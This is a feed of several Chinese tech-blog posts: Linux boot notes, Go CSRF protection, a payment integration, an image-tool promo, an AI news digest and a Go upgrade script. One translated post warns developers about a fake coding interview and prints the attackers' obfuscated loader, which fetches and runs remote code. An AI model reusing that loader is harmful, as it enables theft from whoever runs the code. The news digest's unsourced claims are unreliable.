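		count := slotsIn(r, imageSize, align)
		if n < count {
			return alignUp(r.start, align) + n*align, true
		}
		n -= count
	}
	return 0, false
}

func main() {
	regions := []region{
		{start: 0x100000, size: 0x400000},  // 1 MiB .. 5 MiB
		{start: 0x1000000, size: 0x800000}, // 16 MiB .. 24 MiB
	}
	base, ok := pickBase(regions, 0x200000, 0x200000, 7)
	fmt.Printf("%#x %v\n", base, ok)
}
```

When `ok` is false the caller would fall back to the default address, matching the fallback behaviour described in the text.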

如果没有合适的区域可用，代码会回退到默认地址并打印一个小警告；如果你在命令行传了 nokaslr，则会按设计跳过随机化步骤。

术语速览

十六进制（Hexadecimal）：以 0x 作为前缀的 16 进制数。0x10 是 16，0x100000 是 1MB。十六进制与位存储对齐良好，因此底层代码常用。
寄存器（Register）：CPU 内部用于“当下”存数的微小槽位，如 CS、DS、SS、IP、SP。
段与偏移（Segment/Offset）：在实模式中用于构造物理地址的两部分，公式为：physical = segment * 16 + offset。
BIOS：较早的固件风格，负责开机、自检，并把第一个引导扇区加载到内存。
UEFI：现代固件，理解文件系统，可直接加载更大的引导程序。
引导加载器（Bootloader）：把内核放入内存并向其传递系统事实的“门童”，GRUB 很常见。
栈（Stack）：函数使用的“后进先出”工作台。SS 选择其段，SP 指向当前栈顶。
BSS：用于存放必须从零开始的全局变量区域。C 运行前，内核 setup 代码会清零该区域。
中断（Interrupt）：来自硬件或软件的快速“打断”。CPU 暂停、运行小处理程序后恢复。可屏蔽中断允许暂时阻断，NMI 不可。
GDT（全局描述符表）：段描述符的短表。Linux 在早期设置为简单的扁平模型。
IDT（中断描述符表）：中断处理程序的目录。早期启动使用一个极简版本，完整内核稍后安装真正的表。
A20 线（A20 line）：在老式 PC 上必须打开的历史性开关，否则 1MB 以上寻址不正确。
保护模式（Protected mode）：32 位模式，引入 GDT/IDT，并允许分页。
长模式（Long mode）：x86_64 的 64 位模式，要求启用分页，并在 EFER 寄存器中设置 LME 位。
分页（Paging）：将虚拟地址翻译到物理内存的机制，通过页表实现。
页表（Page tables）：映射虚拟页到物理页的数据结构。早期启动常用“同址映射（identity map）”。常规页大小为 4KB，早期启动经常用 2MB 大页以快速覆盖地址空间。
CR0、CR3、CR4：控制寄存器。CR0 打开保护模式；CR3 指向页表顶层；CR4 启用扩展特性如 PAE。
EFER：模型特定寄存器，包含 Long Mode Enable（LME）等位。
ELF：内核的磁盘格式，内置“该放哪里”的结构化映射。
重定位（Relocation）：当代码被加载到不同于其构建基址的位置时用于修正地址的“补丁”。
kASLR：在启动时随机化内核基址以提高利用难度。
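
As a worked example of the segment/offset formula and the A20 entry in this glossary, the short Go sketch below computes a real-mode physical address and shows what happens at the 1MB boundary when address bit 20 is forced to zero. The function names are illustrative.

```go
package main

import "fmt"

// physical returns the address formed by a real-mode segment:offset pair.
func physical(segment, offset uint16) uint32 {
	return uint32(segment)*16 + uint32(offset)
}

// wrapA20 models the address bus with the A20 line disabled: bit 20 is
// forced to zero, so addresses at 1 MiB wrap around to low memory.
func wrapA20(addr uint32) uint32 {
	return addr &^ (1 << 20)
}

func main() {
	// The classic boot sector location 0x07C0:0x0000.
	fmt.Printf("%#x\n", physical(0x07C0, 0x0000))
	// 0xFFFF:0x0010 is exactly 1 MiB, one byte past the 20-bit range.
	addr := physical(0xFFFF, 0x0010)
	fmt.Printf("%#x with A20 on, %#x with A20 off\n", addr, wrapA20(addr))
}
```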

作者

订阅 Feed：https://www.0xkato.xyz/feed.xml
网站首页：https://www.0xkato.xyz/
关于作者：https://www.0xkato.xyz/about
X（Twitter）：https://x.com/0xkato

原文

https://www.0xkato.xyz/linux-boot/

独立开发:AI图生图获得第一位付费用户，现在支持在线支付了

2025-11-01T16:00:00.000Z

独立开发的AI图生图工具“即梦”获得了第一位付费用户，并且现在支持在线支付了。

收款方式

最开始为了快速打通，是在定价页面上贴了微信二维码，让用户加群支付，这种方式过于复杂，用户体验也不是很好。

从多个渠道了解了独立开发的收款方式，最终选择了微信支付。微信支付在国内用户中足够流行，目前也是最容易接入的几种可靠支付方式之一，并且使用起来也比较方便。

现在可以在“AI图生图”的官方网站上直接购买服务啦。

效果如下：

其他方式

国外的Stripe，lemonsqueezy很流行，但搜了很多资料，目前看都是需要以公司为主体才能申请，个人很难通过。

参考

译|在 Go 中防止 CSRF 的现代方法,CrossOriginProtection

2025-10-16T16:00:00.000Z

Go 1.25 在标准库中引入了一个新的中间件 http.CrossOriginProtection。这让我思考：我们是否终于可以在不依赖基于令牌的检查（如双重提交 Cookie）的情况下防止 CSRF 攻击？是否可以在不引入第三方包（如 justinas/nosurf 或 gorilla/csrf）的情况下构建安全的 Web 应用？

答案是一个谨慎的 “是” —— 只要满足一些重要条件。

`http.CrossOriginProtection` 中间件

该中间件通过检查请求中的 Sec-Fetch-Site 和 Origin 头来判断请求来源。它会自动拒绝来自非同源的 非安全请求（如 POST、PUT），并返回 403 Forbidden。

工作原理

现代浏览器 会自动在请求中包含 Sec-Fetch-Site 头。
如果请求来源与目标页面同源，则头部为 same-origin。
如果不同源，则 http.CrossOriginProtection 会拒绝请求。
如果没有 Sec-Fetch-Site，则回退检查 Origin 与 Host 是否匹配。
如果两者都不存在，则认为请求不是来自浏览器，允许通过。
仅对 非安全方法（POST、PUT 等）进行检查，GET/OPTIONS 等安全方法始终允许。
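
The decision steps listed above can be written down as a small pure function. This is a simplified sketch that follows only the list in this article; it is not the standard library's implementation, which handles further cases such as trusted origins. The function name and parameters are assumptions for illustration.

```go
package main

import (
	"fmt"
	"net/url"
)

// allowRequest reports whether a request passes the checks listed above.
// secFetchSite and origin are raw header values ("" when absent) and host is
// the value of the Host header.
func allowRequest(method, secFetchSite, origin, host string) bool {
	// Safe methods are never blocked.
	switch method {
	case "GET", "HEAD", "OPTIONS":
		return true
	}
	// Modern browsers: decide from Sec-Fetch-Site when it is present.
	if secFetchSite != "" {
		return secFetchSite == "same-origin"
	}
	// Neither header present: assume a non-browser client.
	if origin == "" {
		return true
	}
	// Fallback: compare the host part of Origin with the Host header.
	u, err := url.Parse(origin)
	if err != nil {
		return false
	}
	return u.Host == host
}

func main() {
	fmt.Println(allowRequest("POST", "cross-site", "https://evil.example", "example.com"))
	fmt.Println(allowRequest("POST", "same-origin", "https://example.com", "example.com"))
	fmt.Println(allowRequest("POST", "", "", "example.com"))
}
```

Note that the fallback compares hosts only, so an Origin of http://example.com matches a Host of example.com even when the site is served over HTTPS; the limitations section later in the article discusses this case.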

使用示例

package main

import (
    "fmt"
    "log/slog"
    "net/http"
    "os"
)

func main() {
    mux := http.NewServeMux()
    mux.HandleFunc("/", home)

    slog.Info("starting server on :4000")
    err := http.ListenAndServe(":4000", http.NewCrossOriginProtection().Handler(mux))
    if err != nil {
        slog.Error(err.Error())
        os.Exit(1)
    }
}

func home(w http.ResponseWriter, r *http.Request) {
    fmt.Fprint(w, "Hello!")
}

如果您愿意，也可以配置 http.CrossOriginProtection 的行为。配置选项包括能够添加受信任的来源（允许来自这些来源的跨域请求），以及能够为被拒绝的请求使用自定义处理程序，而不是默认的 403 Forbidden 响应。

想自定义行为时，可以使用如下模式：

文件: main.go

package main

import (
    "fmt"
    "log/slog"
    "net/http"
    "os"
)

func main() {
    mux := http.NewServeMux()
    mux.HandleFunc("/", home)

    slog.Info("starting server on :4000")

    err := http.ListenAndServe(":4000", preventCSRF(mux))
    if err != nil {
        slog.Error(err.Error())
        os.Exit(1)
    }
}

func preventCSRF(next http.Handler) http.Handler {
    cop := http.NewCrossOriginProtection()

    cop.AddTrustedOrigin("https://foo.example.com")

    cop.SetDenyHandler(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        w.WriteHeader(http.StatusBadRequest)
        w.Write([]byte("CSRF check failed"))
    }))

    return cop.Handler(next)
}

func home(w http.ResponseWriter, r *http.Request) {
    fmt.Fprint(w, "Hello!")
}

限制

http.CrossOriginProtection 的主要限制是它只对阻止来自现代浏览器的请求有效。您的应用程序仍然容易受到来自不包含 Sec-Fetch-Site 或 Origin 头（通常是 2020 年之前的）的旧版浏览器的 CSRF 攻击。

目前，浏览器对 Sec-Fetch-Site 头的支持率为 92%，对 Origin 头为 95%。因此，通常情况下，仅仅依靠 http.CrossOriginProtection 不足以作为您唯一的 CSRF 防护措施。

还需要注意的是，只有当您的应用程序具有“可信来源”时才会发送 Sec-Fetch-Site 头——这基本上意味着您的应用程序在生产环境中使用 HTTPS（或开发期间使用 localhost），http.CrossOriginProtection 才能充分发挥作用。

您还应该知道，当请求中不存在 Sec-Fetch-Site 头，并且回退到比较 Origin 和 Host 头时，Host 头不包含方案。这个限制意味着当不存在 Sec-Fetch-Site 头但存在 Origin 头时，http.CrossOriginProtection 会错误地允许从 http://{host} 到 https://{host} 的跨域请求。为了减轻这种风险，您理想情况下应该配置您的应用程序使用 HTTP 严格传输安全 (HSTS)。

强制使用 TLS 1.3

深入研究这个问题让我开始思考… 如果您已经计划使用 HTTPS 并强制使用 TLS 1.3 作为最低支持的 TLS 版本呢？您能否确信所有支持 TLS 1.3 的网络浏览器也支持 Sec-Fetch-Site 或 Origin 头之一呢？

据我从 MDN 兼容性数据和 Can I Use 网站的表格来看，答案是“是”，适用于（几乎）所有主流浏览器。

如果您强制使用 TLS 1.3 作为最低版本：

不支持 TLS 1.3 的旧版浏览器根本无法连接到您的应用程序。
对于支持 TLS 1.3 并可以连接的现代主流浏览器，您可以确信至少支持 Sec-Fetch-Site 或 Origin 头之一——因此 http.CrossOriginProtection 将有效工作。

我能看到的唯一例外是 Firefox v60-69 (2018-2019)，它不支持 Sec-Fetch-Site 头，并且不为 POST 请求发送 Origin 头。这意味着 http.CrossOriginProtection 将无法有效阻止来自该浏览器的请求。Can I Use 显示 Firefox v60-69 的使用率为 0%，因此这里的风险似乎非常低——但世界上某个地方可能仍然有一些计算机在运行它。

此外，我们只掌握了主流浏览器（Chrome/Chromium、Firefox、Edge、Safari、Opera 和 Internet Explorer）的信息。但当然，还存在其他浏览器。它们大多数是 Chromium 或 Firefox 的分支，因此很可能没问题，但这里没有保证，并且很难量化风险。

因此，如果您使用 HTTPS 并强制使用 TLS 1.3，这是确保 http.CrossOriginProtection 有效工作的一大步。然而，Firefox v60-69 和非主流浏览器仍然存在非零风险，因此您可能希望增加一些纵深防御并同时使用 SameSite Cookie。

我们稍后会更多地讨论 SameSite Cookie，但首先我们需要快速绕道讨论“源 (origin)”和“站点 (site)”这两个术语之间的区别。

跨站点与跨源

在 Web 规范和 Web 浏览器的世界中，跨站点 (cross-site) 和跨源 (cross-origin) 是细微不同的概念，在这样的安全上下文中，理解它们之间的区别并确切地表达我们的意思非常重要。

我将快速解释。

如果两个网站共享完全相同的方案 (scheme)、主机名 (hostname) 和端口（如果存在），则它们具有相同的源 (origin)。因此 https://example.com 和 https://www.example.com 不是相同的源，因为主机名 (example.com 和 www.example.com) 不同。它们之间的请求将是跨源的。
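
The same-origin rule is simple enough to express directly. The following Go sketch compares scheme, hostname and port, treating an omitted port as the scheme's default; it is an illustration of the definition, not code from the standard library, and it does not attempt the same-site check, which needs the public suffix list.

```go
package main

import (
	"fmt"
	"net/url"
)

// effectivePort returns the explicit port, or the scheme default when the
// URL omits it.
func effectivePort(u *url.URL) string {
	if p := u.Port(); p != "" {
		return p
	}
	switch u.Scheme {
	case "https":
		return "443"
	case "http":
		return "80"
	}
	return ""
}

// sameOrigin reports whether two URLs share scheme, hostname and port.
func sameOrigin(a, b string) (bool, error) {
	ua, err := url.Parse(a)
	if err != nil {
		return false, err
	}
	ub, err := url.Parse(b)
	if err != nil {
		return false, err
	}
	same := ua.Scheme == ub.Scheme &&
		ua.Hostname() == ub.Hostname() &&
		effectivePort(ua) == effectivePort(ub)
	return same, nil
}

func main() {
	ok, _ := sameOrigin("https://example.com", "https://www.example.com")
	fmt.Println(ok)
	ok, _ = sameOrigin("https://example.com/a", "https://example.com:443/b")
	fmt.Println(ok)
}
```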

如果两个网站共享相同的方案和可注册域 (registerable domain)，则它们是“同站 (same site)”的。

注意：可注册域是主机名中紧邻（并包括）有效顶级域 (effective TLD) 的部分。以下是一些示例：

对于 https://www.google.com/，顶级域是 com，可注册域是 google.com。
对于 https://login.mail.ucla.edu，顶级域是 edu，可注册域是 ucla.edu。
对于 https://www.gov.uk，顶级域是 gov.uk，可注册域是 www.gov.uk。

您可以在此处找到有效顶级域的完整列表。

因此，https://example.com、https://www.example.com 和 https://login.admin.example.com 都被认为是同站的，因为方案 (https) 和可注册域 (example.com) 相同。它们之间的请求不会被认为是跨站的，但会是跨源的。

注意：某些浏览器版本使用不同的同站定义，它不要求相同的方案，只要求相同的可注册域。对于这些浏览器版本，https://admin.example.com 和 http://blog.example.com 也将被视为同站。

Nowadays this is usually called schemeless same-site, but in older browser versions or documentation it may simply be called same-site.

那么，我在这里想要表达的要点是什么呢？

Go 的 http.CrossOriginProtection 中间件的命名是准确且恰当的。它阻止跨源请求。它比只阻止跨站请求更严格，因为它也阻止来自同一站点（即可注册域下的其他源）的请求。

这很有用，因为它有助于防止您的老旧、十多年未更新的 WordPress 博客 https://blog.example.com 被攻破，并被用来向您的重要网站 https://admin.example.com 发起请求伪造攻击的情况。

当大多数人——包括我自己在内——随意谈论“CSRF 攻击”时，我们大多数时候指的是实际上是跨源请求伪造 (cross-origin request forgery)，而不仅仅是跨站请求伪造 (cross-site request forgery)。很遗憾 CSRF 是描述这类攻击的常用和已知缩写，因为大多数时候 CORF 会更准确和恰当。但嘿！这就是我们所处的混乱世界。

然而，在本文的其余部分，当我的意思确实是跨源请求伪造时，我将使用 CORF 代替 CSRF。

SameSite Cookie 属性自 2017 年起普遍受到网络浏览器的支持，Go 自 v1.11 起也支持。如果您在 Cookie 上设置 SameSite=Lax 或 SameSite=Strict 属性，则该 Cookie 将仅包含在发送到设置它的同一站点的请求中。反过来，这可以防止跨站请求伪造攻击（但不能防止来自同一站点内的跨源攻击）。

这里有一些好消息——所有支持 TLS 1.3 的主流浏览器也都完全支持 SameSite Cookie，据我所知没有例外。因此，如果您强制使用 TLS 1.3，您可以确信所有使用您应用程序的主流浏览器都会遵守 SameSite 属性。

这意味着通过在 Cookie 上使用 SameSite=Lax 或 SameSite=Strict，您可以消除我们之前谈到的 Firefox v60-69 引起的跨站请求伪造风险。

综合考量

如果您结合使用 HTTPS，强制将 TLS 1.3 作为最低版本，适当使用 SameSite=Lax 或 SameSite=Strict Cookie，并在您的应用程序中使用 http.CrossOriginProtection 中间件，据我所知，主流浏览器只剩下两个未被缓解的 CSRF/CORF 风险：

Firefox v60-69 中来自同一站点的 CORF 攻击（即来自您的可注册域下的另一个子域）。
从您的源的 HTTP 版本发起的 CORF 攻击，来自不支持 Sec-Fetch-Site 头的浏览器。

对于第一个风险，如果您在可注册域下没有任何其他网站，或者您确信这些网站是安全的且未被攻破，那么鉴于 Firefox v60-69 的使用率极低，这可能是一个您愿意接受的风险。

对于第二个风险，如果您的源根本不支持 HTTP（包括重定向），那么您无需担心这一点。否则，您可以通过在 HTTPS 响应中包含 HSTS 头来缓解风险。

在本文的开头，我提到在某些条件下不使用基于令牌的 CSRF 检查可能是可以的。那么，让我们回顾一下这些条件是什么：

您的应用程序使用 HTTPS 并强制将 TLS 1.3 作为最低版本。您接受使用旧版浏览器的用户将根本无法连接到您的应用程序。
您遵循良好实践，绝不响应使用安全方法 GET、HEAD、OPTIONS 或 TRACE 的请求来更改重要的应用程序状态。
您同时使用 http.CrossOriginProtection 中间件和 SameSite=Lax 或 SameSite=Strict Cookie。使用 SameSite Cookie 对于一般的纵深防御很重要，更具体地说，是为了缓解来自 Firefox v60-69 的 CSRF 攻击。
由于来自 Firefox v60-69 的未受保护的同站 CORF 攻击风险，您要么在您的可注册域下没有任何其他网站，要么您确信它们是安全且未被攻破的。
您的应用程序源根本没有 HTTP 版本，或者您在 HTTPS 响应中包含 HSTS 头。
最后，您愿意接受来自非主流浏览器（支持 TLS 1.3 但不支持 Origin 或 Sec-Fetch-Site 头或 SameSite Cookie）的 CSRF/CORF 攻击的难以量化的风险。是否存在这样的浏览器？我不知道，我也不确定是否有办法 100% 确定地回答这个问题。因此，您需要在此处进行自己的风险评估，这可能是一个您只愿意接受的风险，如果您的应用程序是一个低价值目标，并且成功进行 CSRF/CORF 攻击的影响既孤立又轻微。

原文

https://www.alexedwards.net/blog/preventing-csrf-in-go

译|面试官引诱我安装恶意软件(我是如何在一次“工作面试”中差点被黑的)

2025-10-16T16:00:00.000Z

我差30秒就在我的机器上运行了恶意软件。

攻击媒介？来自一家“合法”区块链公司的虚假编程面试。

以下是一个复杂的诈骗操作如何几乎骗到我，以及为什么每个开发人员都应该阅读这篇文章。

骗局的设置

上周，我收到了 Mykola Yanchii 的一条 LinkedIn 消息。他是 Symfa 的首席区块链官。真实的公司。真实的 LinkedIn 个人资料。1000 多个联系人。一切看起来都很完美。

消息写得很流畅、专业。“我们正在开发 BestCity，一个旨在改变房地产工作流程的平台。有兼职职位。灵活的结构。”

我做了 8 年的自由职业者。构建过 Web 应用程序，参与过各种项目，也做过代码审查。我通常对安全问题很偏执——或者说我自以为是。

这看起来很合法。所以我同意了通话。

诱饵

在我们见面之前，Mykola 给我发了一个“测试项目”——这是技术面试的标准做法。一个用于评估我技能的 React/Node 代码库。30 分钟的测试。很简单。

Bitbucket 仓库看起来很专业。干净的 README。合适的文档。甚至还有那张公司里常见的、一个女人拿着平板电脑站在房子前的照片。你懂的。

这就是我差点搞砸的地方：我开会要迟到了。只有大约 30 分钟的时间来审查代码。所以我做了懒惰的开发人员会做的事情——我开始在没有先运行代码的情况下到处翻看代码库。

通常，我会沙箱化所有东西。Docker 容器。隔离的环境。但我当时很匆忙。

我花了 30 分钟修复了明显的错误，添加了一个 docker-compose 文件，清理了代码。都是些标准操作。准备好运行它并展示我的工作。

然后我有了那种偏执的开发人员时刻。

幸免于难

在敲下 npm start 之前，我向我的 Cursor AI 代理提出了这个提示：

“在我运行这个应用程序之前，你能看看这个代码库中是否有任何可疑的代码吗？比如读取它不应该读取的文件，访问加密钱包等。”

然后，我惊呆了。

在 server/controllers/userController.js 的正中间，坐落着这个“杰作”：

//Get Cookie
(async () => {
    const byteArray = [
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
        98, 50, 48, 51, 49, 102, 98, 57
    ];
    const uint8Array = new Uint8Array(byteArray);
    const decoder = new TextDecoder('utf-8');
    axios.get(decoder.decode(uint8Array))
        .then(response => {
            new Function("require", response.data.model)(require);
        })
        .catch(error => { });
})();

混淆的。鬼鬼祟祟的。邪恶的。而且 100% 活跃——嵌入在合法的管理功能之间，一旦访问管理路由，就会以完整的服务器权限执行。

我解码了那个字节数组：https://api.npoint.io/2c458612399c3b2031fb9
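
For readers who want to repeat the decoding step safely, the Go sketch below turns the numeric array from the snippet into text and prints it. It only decodes; it never makes a network request. The helper name `decodeBytes` is an assumption, and the array is reproduced exactly as it appears in the snippet, so the printed path may differ by a character from the URL quoted above.

```go
package main

import "fmt"

// decodeBytes turns a list of byte values into the string they spell out.
func decodeBytes(values []int) string {
	buf := make([]byte, len(values))
	for i, v := range values {
		buf[i] = byte(v)
	}
	return string(buf)
}

func main() {
	byteArray := []int{
		104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
		110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
		98, 50, 48, 51, 49, 102, 98, 57,
	}
	// Print the hidden URL for inspection only; do not fetch it.
	fmt.Println(decodeBytes(byteArray))
}
```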

当我第一次访问该 URL 时，它是活动的。我获取了有效载荷。纯粹的恶意软件。那种会窃取一切的东西——加密钱包、文件、密码，你的整个数字存在。

更绝的是：该 URL 在 24 小时后就失效了。这些家伙不是在开玩笑——他们已经设置了他们的基础设施来快速销毁证据。

我通过 VirusTotal 运行了有效载荷——自己看看行为分析。剧透警告：它很恶心。

骗局的操作

这不是一些业余的骗局。这是复杂的：

LinkedIn 个人资料： Mykola Yanchii 看起来 100% 真实。首席区块链官。合适的工作经历。甚至还有那些关于“创新”和“区块链咨询”的令人尴尬的 LinkedIn 帖子。
公司： Symfa 有一个完整的 LinkedIn 公司页面。专业的品牌。多名员工。关于“用区块链改造房地产”的帖子。他们甚至还有附属页面和关注者网络。
方法： 最初的接触中没有危险信号。专业的语言。合理的项目范围。他们甚至使用 Calendly 进行日程安排。
有效载荷： 恶意代码被战略性地放置在服务器端控制器中，准备在访问管理功能时以完整的 Node.js 权限执行。

心理学

这就是为什么这如此危险：

紧迫性： “在会议前完成测试以节省时间。”
权威性： LinkedIn 验证的个人资料，真实的公司，专业的设置。
熟悉度： 标准的带回家的编程测试。每个开发人员都做过几十个这样的测试。
社会认同： 拥有真实员工和真实联系的真实公司页面。

我差点就上当了。而我对这些东西很偏执。

教训

一个简单的人工智能提示让我免于灾难。

不是花哨的安全工具。不是昂贵的杀毒软件。只是在执行未知代码之前，让我的编码助手查找可疑模式。

可怕的是什么？这种攻击媒介对开发人员来说是完美的。我们整天下载和运行代码。GitHub 仓库、npm 包、编程挑战。我们大多数人并不会对每件事都进行沙箱化。

这是服务器端恶意软件。完整的 Node.js 权限。可以访问环境变量、数据库连接、文件系统、加密钱包。一切。

规模

如果这种复杂的行动正在大规模地针对开发人员，那么已经有多少人受到了攻击？他们现在在多少个生产系统中？

完美的定位： 开发人员是理想的受害者。我们的机器包含了王国的钥匙：生产凭证、加密钱包、客户数据。
专业的伪装： LinkedIn 的合法性、真实的代码库、标准的面试流程。
技术复杂性： 多层混淆、远程有效载荷传递、死人开关、服务器端执行。

一次成功的感染可能会危及大公司的生产系统、价值数百万的加密货币持有量、成千上万用户的个人数据。

底线

如果你是一名正在获得 LinkedIn 工作机会的开发人员：

始终沙箱化未知代码。Docker 容器、虚拟机，随便什么。永远不要在你的主机器上运行它。
使用人工智能扫描可疑模式。只需要 30 秒。可以拯救你的整个数字生活。
验证一切。真实的 LinkedIn 个人资料并不意味着真实的人。真实的公司并不意味着真正的机会。
相信你的直觉。如果有人催促你执行代码，那就是一个危险信号。

这个骗局如此复杂，以至于它骗过了我最初的 BS 检测器。但一个偏执的时刻和一个简单的人工智能提示就揭露了整个事情。

下次有人给你发“编程挑战”时，请记住这个故事。

你的加密钱包会感谢你的。

如果你是一名运行过 LinkedIn 招聘人员发来的“编程挑战”的开发人员，你可能应该把这篇文章读两遍。

LinkedIn 个人资料

消息

Bitbucket

https://bitbucket.org/0x3bestcity/test_version/src/main/ - 不确定这个链接会保留多久。

原文

https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview

AI图生图：释放你的无限创造力，免费在线生成惊艳图像

2025-09-26T05:30:00.000Z

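In the wave of digital creativity, artificial intelligence (AI) is giving us unprecedented power to express ourselves. Visual art that once required professional skills and expensive software is now within easy reach thanks to advances in AI. Today we are pleased to introduce a powerful, easy-to-use online tool, AI图生图 (AI Image-to-Image), which can change your creative workflow and make it easy for anyone to create art.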

最重要的是，这款工具限时免费试用，并且无需注册登录，您可以立即开始您的创意之旅！

立即访问 AI图生图，开启无限创造力

核心功能亮点

“AI图生图”不仅仅是一个简单的图像生成器，它集成了多种强大功能，旨在满足从初学者到专业人士的各种需求。

1. 强大的“文生图”与“图生图”模式

无论您是想将脑海中的奇幻场景变为现实，还是希望在现有图片的基础上进行二次创作，我们都能满足您。

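Text-to-Image (文生图): Enter a descriptive piece of text (we call it a "prompt") and the AI draws the corresponding image. Your imagination is the only limit!
Image-to-Image (图生图): Upload one of your own images as a reference. The AI interprets its content, style, and composition, then redraws it or transfers its style according to your new prompt.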

AI图生图：将简单的文字提示变为复杂的视觉作品

2. 丰富的内置预设风格

灵感枯竭？没关系！网站内置了上百种精心调校的预设风格，涵盖3D、动漫、现实主义、纸艺、水墨画等多种艺术形式。只需一键点击，即可将您的想法应用到不同风格上，轻松探索多种可能性。

3. 极致简单的三步操作流程

我们坚信，强大的功能不应以牺牲易用性为代价。整个创作过程被简化为三个直观的步骤：

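Describe your idea: Enter your prompt in the input box, or upload a reference image, and choose a style you like.
Generate: Click the "生成" (Generate) button and the AI model starts working right away.
Download and share: After a few dozen seconds, a high-quality image appears. You can download the high-resolution version immediately or revisit it in your history at any time.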

无限的应用场景

“AI图生图”的潜力覆盖了各行各业，无论您的身份是什么，都能从中受益。

设计师与艺术家： 快速生成概念原型，探索不同视觉风格，为您的项目注入源源不断的灵感。
营销与运营人员： 无需再为寻找配图而烦恼。轻松生成独特、免版权风险的社交媒体帖子、博客文章配图和广告素材。
内容创作者： 为您的视频、播客或小说创作引人入胜的封面和插图。
普通爱好者： 制作个性化的手机壁纸、社交媒体头像，或者仅仅是享受将奇思妙想变为现实的乐趣。

无论是商业广告还是个人创作，AI都能胜任

立即开始您的创作之旅！

创意不应被技术门槛所束缚。“AI图生图”致力于将最前沿的AI技术以最简单的方式带给每一位热爱生活、充满想象力的人。

忘记复杂的参数和昂贵的订阅费吧。现在就打开浏览器，访问我们的网站，释放您被压抑已久的创造力！

官方网站： https://seedreamt.programnotes.cn/

我们期待看到您独一无二的精彩作品！

创意作品

迷你 3D 建筑

Q版求婚场景

三只动物与地标自拍

剪影艺术

立即访问 AI图生图，探索更多创意

参考

阮一峰.科技周刊,Nano Banana 的几个妙用,用图展示了几个google AI生图大模型的创意案例
nano-banana
github 开源项目,搜集了Nano-Banana的创意用法,Awesome-Nano-Banana-images

AI & Tech 最新发展

2025-09-15T16:00:00.000Z

以下是2025年9月15日至16日过去24小时内最重要的AI和技术发展总结，优先关注模型发布、新论文和开源项目。信息基于网络搜索和X平台数据，包含来源链接。内容聚焦于关键公告、工具更新和创新。

模型发布与更新

OpenAI 升级 Codex，使用新版 GPT-5：OpenAI于9月15日发布Codex的升级版本，集成新GPT-5模型，支持更复杂的编码任务，并引入gpt-realtime功能，提升实时交互能力。来源：TechCrunch 和 OpenAI News.
Alibaba 发布 Qwen 3-Next-80B：这是一个高效混合模型，仅激活约30亿参数，支持10倍速度提升和更低成本，适用于任务优化。来源：PaleBlueDot AI on X.
ByteDance 发布 Seedream 4.0：融合图像生成与编辑，支持2K分辨率输出，生成时间不到2秒。来源：PaleBlueDot AI on X.
Kimi Moonshot AI 发布 K2-0905：1万亿参数MoE模型，支持256k上下文长度，针对代理开发任务，如全代码库处理。来源：PaleBlueDot AI on X.
Meta 发布 MobileLLM-R1：小型LLM模型，针对非商业研究，提升移动设备上的语言处理效率。来源：merve on X.
Tencent 发布 SRPO：高分辨率图像生成模型，以及Points-Reader OCR模型，提升文本识别准确性。来源：merve on X.
ByteDance 发布 HuMo：视频生成模型，支持任意输入生成视频。来源：merve on X.
xAI 发布新AI模型：专注于增强对物理世界的理解和操作，推动机器人和自治系统进步。来源：Daily 5 Minutes News on X.
AnthropicAI 更新 Claude 3.7：聚焦自然语言处理改进和实时应用延迟降低。来源：Daily 5 Minutes News on X.

新论文

arXiv 上新AI论文（9月16日）：包括266篇新论文，亮点如“Is the ‘Agent’ Paradigm a Limiting Framework for Next-Generation Intelligent Systems?”（质疑代理范式对下一代智能系统的限制），以及其他涉及诊断精神患者、生成AI故事等主题。来源：arXiv Artificial Intelligence Recent.
机器学习论文更新：焦点包括使用大语言模型诊断精神患者，以及其他如模拟酵母着丝粒、诊断一维CNN等。来源：arXiv Machine Learning Current.
新兴技术论文：45篇新作，如新西兰房屋能源效率AI工具原型。来源：arXiv Emerging Technologies Current.
Harvard AI论文：PDGrapher：AI工具发现逆转细胞疾病的药物组合。来源：jeromekjerome on X.

开源项目与工具

MistralAI 发布新开源模型：旨在民主化高性能语言处理工具访问。来源：Daily 5 Minutes News on X.
HuggingFace 更新模型仓库：新增50+ NLP和计算机视觉AI模型。来源：Daily 5 Minutes News on X.
StabilityAI 扩展文本到图像功能：提供更高分辨率和更快处理。来源：Daily 5 Minutes News on X.
Replit Agent 3：自主代理工具，用于构建生产级应用，支持10倍自治能力。来源：AI News on X.
NVIDIA 发布 Physics Nemo：物理模拟开源模型。来源：AI News on X.
Switzerland 发布 Apertus：国家级开源AI模型。来源：The AI Track.

其他重要公告与更新

OpenAI 与 Microsoft 重组：签署非约束性谅解备忘录，推动OpenAI向营利性转型，非营利部门保留1000亿美元以上股权。来源：PaleBlueDot AI on X.
OpenAI 获得66亿美元融资：加速AI研发。来源：Daily 5 Minutes News on X.
NVIDIA Rubin CPX 发布：新加速器用于推理预填充阶段，减少对HBM依赖。来源：PaleBlueDot AI on X.
DeepMind 发布新AI伦理框架：指导全球AI系统的负责开发和部署。来源：Daily 5 Minutes News on X.

Serverless|在阿里云FC上部署Go,构建环境中GO版本的切换

2025-09-10T16:00:00.000Z

FC的运行环境custom.debian10和fc构建流水线中默认的go版本为1.18,已经大幅落后,这里介绍下如何修改构建环境中的go版本

脚本

# 删除之前的go
rm -rf /usr/local/go
# 安装指定版本 1.23.12
wget https://golang.google.cn/dl/go1.23.12.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.23.12.linux-amd64.tar.gz
# 设置环境变量
export PATH=/usr/local/go/bin:$PATH

只需在 pre-deploy 步骤中执行这段脚本即可

配置文件

# ------------------------------------
#   If you need English case, you can refer to [s_en.yaml] file
# ------------------------------------
#   欢迎您使用阿里云函数计算 FC 组件进行项目开发
#   组件仓库地址：https://github.com/devsapp/fc
#   组件帮助文档：https://www.serverless-devs.com/fc/readme
#   Yaml参考文档：https://www.serverless-devs.com/fc/yaml/readme
#   关于：
#      - Serverless Devs和FC组件的关系、如何声明/部署多个函数、超过50M的代码包如何部署
#      - 关于.fcignore使用方法、工具中.s目录是做什么、函数进行build操作之后如何处理build的产物
#   等问题，可以参考文档：https://www.serverless-devs.com/fc/tips
